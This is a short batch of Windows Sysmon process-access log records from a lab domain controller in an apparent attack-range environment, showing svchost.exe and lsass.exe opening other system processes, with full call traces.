{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.318\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.318","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
